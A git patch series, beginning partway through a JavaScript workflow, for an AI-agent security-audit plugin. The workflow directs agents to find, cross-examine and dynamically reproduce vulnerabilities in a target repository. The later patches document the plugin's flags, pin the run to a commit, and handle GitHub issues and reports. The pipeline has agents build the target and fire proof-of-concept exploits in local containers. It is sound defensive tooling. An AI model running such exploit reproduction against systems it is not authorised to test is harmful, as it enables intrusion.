+const REPRO = { type: 'object', properties: { reproduced: { type: 'boolean' }, method: { enum: ['live-exploit', 'unit-test', 'build-only', 'static-poc'] }, environment: { type: 'string' }, setup_commands: { type: 'array', items: { type: 'string' } }, poc: { type: 'string' }, observed: { type: 'string' }, impact: { type: 'string' }, notes: { type: 'string' } }, required: ['reproduced', 'method'], additionalProperties: true }
+const SYNTH = { type: 'object', properties: { report: { type: 'string' }, path: { type: 'string' }, stats: { type: 'object' } }, required: ['report'], additionalProperties: true }
+
+const AGENT = { agentType: 'general-purpose' }
+
+// ---- phase 1: recon ----
+phase('Recon')
+const recon = await agent(
+  `Follow the recon instructions in ${TOOL}/prompts/recon.md. Read that file first, then perform PHASE-1 recon on the target repository at ${TARGET} (ref ${REF}). Use Read/Grep/Bash/ast-grep to inspect it. Output the structured recon summary.\nHOST CONSTRAINTS (factor into run_strategy — do not pick a strategy the host can't execute): ${HOST || 'none noted'}.\n${SIGNAL}`,
+  { label: 'recon', phase: 'Recon', schema: RECON, ...AGENT },
+)
+
+// Explicit --classes is authoritative; otherwise use recon's relevant set (objects -> keys).
+let classes
+if (ONLY) {
+  classes = ONLY.filter(c => ALL_CLASSES.includes(c))
+} else {
+  classes = (recon.relevant_classes || []).map(c => (typeof c === 'string' ? c : c && c.class)).filter(c => ALL_CLASSES.includes(c))
+  if (!classes.length) classes = ALL_CLASSES
+}
+const runnable = DYNAMIC && ['docker-compose', 'docker', 'native'].includes(recon.run_strategy)
+log(`recon: ${recon.stack} | strategy: ${recon.run_strategy} | classes: ${classes.join(', ')} | dynamic: ${runnable ? 'yes' : 'no'}`)
+
+// ---- phase 2: triage finders ----
+phase('Triage')
+const finderResults = (await parallel(classes.map(k => () => agent(
+  `Audit the target repository for the "${k}" vulnerability class. FIRST read the finder prompt at ${TOOL}/prompts/finders/${k}.md and follow it exactly. Target: ${TARGET} (ref ${REF}). Prioritize these surfaces surfaced by recon: ${JSON.stringify((recon.attack_surface || []).slice(0, 40))}. Inspect code with Read/Grep/Bash/ast-grep. ${SIGNAL} Return {findings:[...]}; each candidate must fill source, sink, data_flow, and sanitizers_checked. Return {findings:[]} if nothing real.`,
+  { label: `find:${k}`, phase: 'Triage', schema: FINDINGS, ...AGENT },
+)))).filter(Boolean)
+const raw = finderResults.flatMap(r => (r && r.findings) || [])
+log(`triage: ${raw.length} raw candidates from ${classes.length} finders`)
+
+// ---- phase 3: consolidate (barrier: needs all candidates at once) ----
+phase('Consolidate')
+let consolidated = []
+if (raw.length) {
+  const c = await agent(
+    `You are the triage lead for a security audit of ${TARGET}. Raw candidate findings from per-class finders:\n${JSON.stringify(raw)}\n\nDeduplicate: collapse the same root cause across multiple call sites into ONE finding with a locations[] list. Assign stable ids by class (AC-1, SSRF-1, INJ-1, ...). Drop noise per the signal policy. Order by severity. ${SIGNAL} Return {findings:[...]}.`,
+    { label: 'consolidate', phase: 'Consolidate', schema: FINDINGS, ...AGENT },
+  )
+  consolidated = (c && c.findings) || []
+}
+log(`consolidated: ${consolidated.length} candidate findings`)
+
+// ---- phases 4-6: per-finding pipeline (deep review -> verify -> repro) ----
+const processed = consolidated.length ? await pipeline(
+  consolidated,
+  // 4. deep review
+  (f) => agent(
+    `Deep-review this candidate against the target ${TARGET} (ref ${REF}). Finding:\n${JSON.stringify(f)}\n\nRead the surrounding code: the sink, its callers, any sanitizers/validators/authz on the path, and related files — as a careful reviewer would. Decide if there is a REACHABLE path from untrusted input to the sink with no effective mitigation. If it is a false positive, unreachable, mitigated, or out of scope, set keep=false with a short reject_reason. Otherwise keep=true and return the finding enriched with accurate severity, confidence, data_flow, sanitizers_checked, and a high-level proposed_fix (the DIRECTION of the change and why — not a diff or line-level patch; implementation is left to whoever takes the issue). ${SIGNAL}`,
+    { label: `review:${f.id || f.title}`, phase: 'Review', schema: DEEP, ...AGENT },
+  ),
+  // 5. adversarial verify (skeptic panel)
+  async (rev) => {
+    if (!rev || !rev.keep) return rev
+    const votes = (await parallel(Object.keys(LENSES).map(lens => () => agent(
+      `You are an INDEPENDENT security skeptic. Try to REFUTE this finding for target ${TARGET}, using the "${lens}" lens. Read the actual code to check. Finding:\n${JSON.stringify(rev.finding)}\n\nLens: ${LENSES[lens]}\nDefault to refuted=true if you cannot establish a concrete, reachable exploit. Return your verdict.`,
+      { label: `verify:${rev.finding.id || 'f'}:${lens}`, phase: 'Verify', schema: VERDICT, ...AGENT },
+    )))).filter(Boolean)
+    const refutes = votes.filter(v => v.refuted).length
+    return { ...rev, keep: refutes < 2, refuted: refutes >= 2, verdicts: votes }
+  },
+  // 6. dynamic repro (only survivors, only if runnable)
+  async (rev) => {
+    if (!rev) return rev
+    if (!rev.keep || !runnable) return { ...rev, repro: null }
+    const repro = await agent(
+      `Reproduce this finding dynamically against a RUNNING instance of the target, to prove it. Finding:\n${JSON.stringify(rev.finding)}\nRun strategy: ${recon.run_strategy}. Boot notes from recon: ${JSON.stringify(recon.notes || '')}.\nFollow the env playbook at ${TOOL}/prompts/playbooks/${recon.stack}.md. Create a git worktree of ${TARGET} at ${REF} so the original tree is untouched; build & run it (docker-first). Use a UNIQUE container name and an ephemeral host port keyed to "${rev.finding.id || 'f'}" to avoid collisions with parallel repros. Fire the PoC and capture the observed result as evidence. Keep ALL traffic local — no external targets, no real credentials, no exfiltration. Tear down containers/processes and the worktree when done. HOST CONSTRAINTS (honor when choosing how to run — e.g. if docker is unavailable, run the app natively instead): ${HOST || 'none noted'}. If it genuinely cannot run live, fall back to a unit-test or static PoC and set method accordingly. Return the repro result.`,
+      { label: `repro:${rev.finding.id || 'f'}`, phase: 'Repro', schema: REPRO, ...AGENT },
+    )
+    return { ...rev, repro }
+  },
+) : []
+
+const results = processed.filter(Boolean)
+
+// normalize status: confirmed (live repro) > likely (kept, no repro) > triage (rejected)
+const finalFindings = results.map(r => {
+  const f = { ...r.finding }
+  if (!r.keep) f.status = 'triage'
+  else if (r.repro && r.repro.reproduced) f.status = 'confirmed'
+  else f.status = 'likely'
+  const fp = fingerprint(f)
+  const display_id = `${TARGET_NAME}-${CLASS_CODE[f.vuln_class] || 'GEN'}-${fp.slice(0, 4)}`  // provisional; courier swaps the suffix for the GitHub issue number
+  return { ...f, fp, display_id, kept: !!r.keep, reject_reason: r.reject_reason || null, verdicts: r.verdicts || null, repro: r.repro || null }
+})
+
+// tally
+const sevOrder = ['critical', 'high', 'medium', 'low', 'info']
+const counts = { bySeverity: {}, byStatus: { confirmed: 0, likely: 0, triage: 0 }, total: finalFindings.length }
+for (const s of sevOrder) counts.bySeverity[s] = 0
+for (const f of finalFindings) {
+  if (counts.bySeverity[f.severity] !== undefined) counts.bySeverity[f.severity]++
+  if (counts.byStatus[f.status] !== undefined) counts.byStatus[f.status]++
+}
+log(`results: ${counts.byStatus.confirmed} confirmed, ${counts.byStatus.likely} likely, ${counts.byStatus.triage} triage`)
+
+// ---- phase 7: synthesize the bundle (report.md + findings.json + manifest.json) ----
+phase('Report')
+const BUNDLE = `${OUT}/reports/${TARGET_NAME}`
+const synth = await agent(
+  `Produce the audit BUNDLE — the self-contained artifact a separate "courier" agent will fetch and file to GitHub. Create the directory ${BUNDLE}/ and write THREE files.
+
+SOURCE DATA — the finalized findings (each carries fp, display_id, severity, status, source/sink/data_flow, PoC via repro.observed, and proposed_fix):
+${JSON.stringify(finalFindings)}
+
+Severity tally: ${JSON.stringify(counts)}
+Recon: ${JSON.stringify({ stack: recon.stack, frameworks: recon.frameworks, run_strategy: recon.run_strategy, relevant_classes: classes, skipped: recon.skipped_classes })}
+
+1. ${BUNDLE}/report.md — the human report. FIRST read ${TOOL}/prompts/report-template.md and follow it EXACTLY. Use each finding's "display_id" as its [ID] in the headings. Target: ${TARGET} (ref ${REF}). Scope: ${SCOPE}. Body = confirmed/likely Critical/High/Medium only; appendix = Low/Info + triage (with why) + coverage & method. Terse, senior-oriented; let CWE/OWASP-2025/ASVS refs carry the explanation; show PoC evidence for confirmed findings.
+
+2. ${BUNDLE}/findings.json — write the SOURCE DATA array above VERBATIM as JSON. Preserve every field and all PoC/observed/fix text exactly; do NOT summarize, reorder, or drop fields. This is the machine interface the courier reconciles against (keyed by "fp").
+
+3. ${BUNDLE}/manifest.json — a JSON object describing the scan. Get real values via Bash: \`date -u +%Y-%m-%dT%H:%M:%SZ\` for date; \`git -C ${TARGET} rev-parse HEAD\` for commit; \`git -C ${TARGET} remote get-url origin\` for the repo (normalize an SSH/HTTPS URL to "owner/repo"). Shape: { "tool": "vuln-audit", "schema": 1, "repo": "<owner/repo or null>", "target_path": "${TARGET}", "ref": "${REF}", "commit": "<full sha>", "slug": "${TARGET_NAME}", "date": "<utc iso8601>", "dynamic": ${runnable}, "classes_assessed": ${JSON.stringify(classes)}, "counts": ${JSON.stringify(counts)} }.
+
+Return {report: "<the full report.md content>", path: "${BUNDLE}/report.md", stats: ${JSON.stringify(counts)}}.`,
+  { label: 'synthesize', phase: 'Report', schema: SYNTH, ...AGENT },
+)
+
+return {
+  bundle_dir: BUNDLE,
+  report_path: (synth && synth.path) || `${BUNDLE}/report.md`,
+  findings_path: `${BUNDLE}/findings.json`,
+  manifest_path: `${BUNDLE}/manifest.json`,
+  report: synth && synth.report,
+  counts,
+  stack: recon.stack,
+  classes_assessed: classes,
+  runnable: !!runnable,
+}

From 77e0595dd914de9a2aab07ba443d3a86b7553748 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 11:51:06 +0200
Subject: [PATCH 2/5] security: document audit flags in README

Add a flag-reference table explaining --no-dynamic, --classes, --ref, and
--out, which were previously listed only as usage examples.
---
 plugins/security/README.md | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/plugins/security/README.md b/plugins/security/README.md
index 98ea224..458961a 100644
--- a/plugins/security/README.md
+++ b/plugins/security/README.md
@@ -24,8 +24,17 @@ Then run `/reload-plugins` if the command doesn't appear.
 /security:audit /abs/path/to/target-repo --out /abs/writable/dir
 ```
 
-The output **bundle** is written to `<cwd>/vuln-audit-reports/<slug>/` (or
-`--out`): `report.md` + `findings.json` + `manifest.json`.
+The first argument is the path to the target repo (required). The flags:
+
+| Flag | Meaning |
+|------|---------|
+| `--no-dynamic` | Skip the build/run/PoC phase — static review + adversarial verify only. |
+| `--classes` | Comma-separated vuln-class keys to restrict the audit to (e.g. `injection,ssrf,access-control`; see [`AGENTS.md`](AGENTS.md) for the full taxonomy). Default: classes picked by recon. |
+| `--ref` | Git ref to audit. Default: `HEAD`. |
+| `--out` | Writable directory for the output bundle. Default: `<cwd>/vuln-audit-reports`. |
+
+The output **bundle** is written to `<out>/<slug>/`: `report.md` +
+`findings.json` + `manifest.json`.
 
 ## How it works
 

From d6a6778a859eb293e5809598314573fa4f01a451 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 11:51:06 +0200
Subject: [PATCH 3/5] security: pin and announce the audit run ref
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Resolve the ref to a concrete commit and print a terse startup line (target,
pinned SHA, output dir), naming the ref only when it isn't HEAD — instead of
echoing the literal "HEAD"/"default".
---
 plugins/security/skills/audit/SKILL.md | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/plugins/security/skills/audit/SKILL.md b/plugins/security/skills/audit/SKILL.md
index b31f646..fe83f68 100644
--- a/plugins/security/skills/audit/SKILL.md
+++ b/plugins/security/skills/audit/SKILL.md
@@ -40,6 +40,9 @@ changing anything.
 3. **Validate the target** — confirm it exists and is a git repo
    (`git -C <target> rev-parse --git-dir`). Worktree isolation and the live-PoC
    phase need git. If it isn't a repo, warn and proceed with `--no-dynamic`.
+   Resolve the ref to a concrete commit with
+   `git -C <target> rev-parse --short <ref or HEAD>` so the run is pinned and
+   reproducible; carry both the ref name and the resolved SHA.
 4. **Preflight host capabilities** → assemble a `hostNotes` string: is `docker`
    usable non-interactively (note if it needs `sudo`); which native runtimes are
    present (`python3`, `node`, `ruby`, `go`, `crystal`, ...). If dynamic is on
@@ -47,7 +50,11 @@ changing anything.
    `--no-dynamic` and say repro will be static/unit-test only.
 5. **Check target threat-model** — note whether
    `<target>/.claude/claude-security-guidance.md` exists; recon folds it in.
-6. **Invoke the workflow** (it runs in the background and notifies on completion):
+6. **Announce the run** — before invoking, print a one-line startup summary:
+   target name, the resolved commit (short SHA), and the absolute output
+   directory. Name the ref only when it isn't `HEAD` (e.g. `v1.2.0 a1b2c3d`);
+   for a plain `HEAD` run just show the SHA. Drop anything left at its default.
+7. **Invoke the workflow** (it runs in the background and notifies on completion):
    ```
    Workflow({ scriptPath: '${CLAUDE_PLUGIN_ROOT}/workflows/vuln-audit.js', args: {
      toolRoot: '${CLAUDE_PLUGIN_ROOT}',
@@ -60,7 +67,7 @@ changing anything.
      hostNotes: '<from step 4>'
    }})
    ```
-7. **Present the result** — when it completes, read `report_path` and give a
+8. **Present the result** — when it completes, read `report_path` and give a
    tight summary: severity counts and the top 1–3 confirmed findings (title +
    location + one-line impact). Point to the bundle dir; don't paste the whole
    report. Surface anything that blocked dynamic verification.

From 6119120029fd91741ed97ff9dbb4defd937053ed Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 14:34:04 +0200
Subject: [PATCH 4/5] security: embed scan report as an upserted epic comment
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Document that the full report.md lives in a collapsed <details> comment on
the scan epic — never a VM-local bundle path — and that the courier upserts
that comment via a hidden marker so re-runs stay idempotent.
---
 plugins/security/docs/issue-tracking.md | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/plugins/security/docs/issue-tracking.md b/plugins/security/docs/issue-tracking.md
index 94901da..503250b 100644
--- a/plugins/security/docs/issue-tracking.md
+++ b/plugins/security/docs/issue-tracking.md
@@ -46,8 +46,9 @@ Each scan drops a self-contained bundle at `reports/<slug>/` on the VM:
 
 ## Issue model
 
-- **Scan issue** (epic), one per run: holds the report + general comments; closes
-  when all its finding sub-issues close.
+- **Scan issue** (epic), one per run: holds the report (as a comment, see
+  **Report comment** below) + general comments; closes when all its finding
+  sub-issues close.
 - **Finding sub-issue**, one per **Critical / High / Medium** (confirmed+likely).
   **Low/Info stay in the report appendix — never issues** (same high-signal
   contract as the report).
@@ -63,6 +64,12 @@ Each scan drops a self-contained bundle at `reports/<slug>/` on the VM:
 - **PoC handling:** repos are private/internal, so full PoC commands go in the
   issues (the remediation is a high-level *proposed fix*, not a patch). (If a target were public, use GitHub Security Advisories for
   Critical/High instead.)
+- **Report comment:** the full `report.md` is **embedded** in a comment on the
+  scan epic, wrapped in a `<details><summary>…</summary>` block (collapsed by
+  default) so the long report never buries the epic's sub-issue checklist. Always
+  embed the report text itself — **never** reference a local bundle path
+  (`reports/<slug>/…`) or any filesystem location, which is unreachable from
+  GitHub. The epic body points readers to this comment, not to disk.
 
 ## Reconcile algorithm (idempotent, keyed by `fp`)
 
@@ -75,6 +82,11 @@ by the `fp:<hash>` label (`gh issue list --search "label:fp:<fp>" --state all`):
 - **previously open, now absent / not reproduced** (dynamic re-verify) → comment +
   close.
 
+The **report comment** on the epic is upserted the same way: tag it with a
+hidden marker (`<!-- vuln-audit:report -->`), then find-and-edit that comment
+on re-run instead of posting a new one — so the epic never accumulates
+duplicate report blocks.
+
 Re-running the courier on the same bundle is a no-op. The dynamic-repro phase
 doubles as the fix-verifier, so "everything closed when done" is provable, not
 manual.

From 20828916a42f14f6e4f9bad5cb9a430cfe605049 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 14:44:12 +0200
Subject: [PATCH 5/5] security: trim issue labels to fp + security

Severity, class, and verification status already live in the issue title,
display ID, and body, so sev:/vuln:/status: labels just duplicated that text.
Keep fp:<hash> (the dedup key the reconcile step searches on) and
security/security-scan.
---
 plugins/security/docs/issue-tracking.md | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/plugins/security/docs/issue-tracking.md b/plugins/security/docs/issue-tracking.md
index 503250b..36e972b 100644
--- a/plugins/security/docs/issue-tracking.md
+++ b/plugins/security/docs/issue-tracking.md
@@ -55,12 +55,14 @@ Each scan drops a self-contained bundle at `reports/<slug>/` on the VM:
 - **Title:** `[Critical] training-tool-AC-42: <short title> (access-control)`.
 - **Body:** the report's finding block (refs · location · PoC · impact ·
   proposed fix) + backlink to the scan issue + the `fp` marker.
-- **Labels:** `security`, `security-scan` (epic), `sev:{critical,high,medium}`,
-  `vuln:<class>`, `fp:<hash>`, `status:{confirmed,likely}` (verification outcome).
+- **Labels:** `security`, `security-scan` (epic), and `fp:<hash>` (the dedup
+  key). Severity and class aren't labels — they live in the title
+  (`[Critical] … (access-control)`) and the display ID, so a `sev:`/`vuln:`
+  label would just duplicate that text.
 - **Two distinct "statuses":** *verification* (confirmed/likely — a scan output,
-  carried as the finding's badge + the `status:` label) vs *lifecycle*
-  (open/fixed — owned entirely by the GitHub issue). The **report has no status
-  table**; the scan epic and its sub-issues are the live status.
+  carried as the finding's badge in the title/body) vs *lifecycle* (open/fixed —
+  owned entirely by the GitHub issue). The **report has no status table**; the
+  scan epic and its sub-issues are the live status.
 - **PoC handling:** repos are private/internal, so full PoC commands go in the
   issues (the remediation is a high-level *proposed fix*, not a patch). (If a target were public, use GitHub Security Advisories for
   Critical/High instead.)